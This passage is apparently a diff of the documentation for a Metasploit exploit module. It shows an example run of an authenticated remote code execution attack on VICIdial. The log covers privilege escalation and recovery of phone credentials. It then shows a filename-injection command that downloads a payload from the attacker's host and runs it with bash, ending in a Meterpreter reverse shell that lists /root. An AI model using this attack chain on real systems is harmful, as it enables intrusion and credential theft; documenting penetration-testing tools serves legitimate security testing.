@@ -181,46 +181,61 @@ System should be installed. Please type 'reboot' to cleanly load everything.
181
181
Using ` cmd/linux/http/x64/meterpreter_reverse_tcp ` :
182
182
183
183
```
184
- msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > run http://192.168.1.4 username=6666 password=password
185
- [*] Exploit running as background job 7 .
184
+ msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > run http://192.168.1.28 username=6666 password=password
185
+ [*] Exploit running as background job 12 .
186
186
[*] Exploit completed, but no session was created.
187
187
msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) >
188
- [*] Started reverse TCP handler on 192.168.1.36:1337
189
- [*] Using URL: http://192.168.1.36:5000/W5akuCuThi0ZAuR
188
+ [*] Started reverse TCP handler on 192.168.1.36:4444
189
+ [*] Running automatic check ("set AutoCheck false" to disable)
190
+ [*] VICIdial version: 2.14-705
191
+ [+] The target is vulnerable.
192
+ [*] Using URL: http://192.168.1.36:5000/piAF2DipO
190
193
[*] Server started.
191
194
[*] Payload is ready at /
192
195
[+] Authenticated successfully as user '6666'
193
196
[+] Updated user settings to increase privileges
194
197
[+] Updated system settings
195
- [+] Created dummy campaign 'Shanahan Group '
198
+ [+] Created dummy campaign 'Haley-Huel '
196
199
[+] Updated dummy campaign settings
197
- [+] Created dummy list 'Shanahan Group List' for campaign '134542 '
200
+ [+] Created dummy list 'Haley-Huel List' for campaign '898934 '
198
201
[+] Found phone credentials: Extension=callin, Password=test, Recording Extension=8309
199
- [+] Retrieved dynamic field names: MGR_login20240918, MGR_pass20240918
202
+ [+] Retrieved dynamic field names: MGR_login20240926, MGR_pass20240926
200
203
[+] Entered "manager" credentials to override shift enforcement
201
204
[+] Authenticated as agent using phone credentials
202
- [+] Session Name: 1726664220_8300defaul12350341 , Session ID: 8600051
203
- [*] Generated malicious command: $([email protected] :5000$IFS-o$IFS.Ip7 &&bash$IFS.Ip7 )
204
- [*] MonitorConf command sent for Channel Local/8309@default on 192.168.1.4
205
- Filename: $([email protected] :5000$IFS-o$IFS.Ip7 &&bash$IFS.Ip7 )
206
- RecorDing_ID: 5
205
+ [+] Session Name: 1727385175_8300defaul11764031 , Session ID: 8600051
206
+ [*] Generated malicious command: $([email protected] :5000$IFS-o$IFS.Vysha &&bash$IFS.Vysha )
207
+ [*] MonitorConf command sent for Channel Local/8309@default on 192.168.1.28
208
+ Filename: $([email protected] :5000$IFS-o$IFS.Vysha &&bash$IFS.Vysha )
209
+ RecorDing_ID: 10
207
210
RECORDING WILL LAST UP TO 60 MINUTES
208
211
209
212
[+] Stopped malicious recording to prevent file size from growing
213
+ [*] Deleting dummy campaign with ID: 898934
214
+ [+] Campaign 898934 deleted successfully.
210
215
[*] Waiting for 300 seconds to allow the cron job to execute the payload...
211
- [*] Received request at: /, Client Address: 192.168.1.4
212
- [*] Sending response to 192.168.1.4 for /
213
- [*] Sending stage (3045380 bytes) to 192.168.1.4
214
- [*] Meterpreter session 45 opened (192.168.1.36:1337 -> 192.168.1.4:7040) at 2024-09-18 16:56:48 +0200
215
-
216
- msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > sessions 45
217
- [*] Starting interaction with 45...
218
-
219
- meterpreter > sysinfo
220
- Computer : 192.168.1.4
221
- OS : (Linux 5.14.21-150500.55.12-default)
222
- Architecture : x64
223
- BuildTuple : x86_64-linux-musl
224
- Meterpreter : x64/linux
216
+ [*] Received request at: / - Client Address: 192.168.1.28
217
+ [*] Sending response to 192.168.1.28 for /
218
+ [*] Sending stage (3045380 bytes) to 192.168.1.28
219
+ [*] Meterpreter session 18 opened (192.168.1.36:4444 -> 192.168.1.28:26572) at 2024-09-27 01:14:12 +0200
220
+
221
+ msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > sessions 18
222
+ [*] Starting interaction with 18...
223
+
224
+ meterpreter > pwd
225
+ /var/spool/asterisk/monitor
226
+ meterpreter > ls
227
+ No entries exist in /var/spool/asterisk/monitor
228
+ meterpreter > ls /root/
229
+ Listing: /root/
230
+ ===============
231
+
232
+ Mode Size Type Last modified Name
233
+ ---- ---- ---- ------------- ----
234
+ 100600/rw------- 254 fil 2024-09-26 22:31:38 +0200 .bash_history
235
+ 040700/rwx------ 4096 dir 2022-03-15 12:35:24 +0100 .gnupg
236
+ 040755/rwxr-xr-x 4096 dir 2023-08-06 12:37:28 +0200 .subversion
237
+ 100644/rw-r--r-- 35 fil 2023-08-06 12:37:27 +0200 .zypper.conf
238
+ 040755/rwxr-xr-x 4096 dir 2022-03-15 12:35:24 +0100 bin
239
+
225
240
meterpreter >
226
241
```
0 commit comments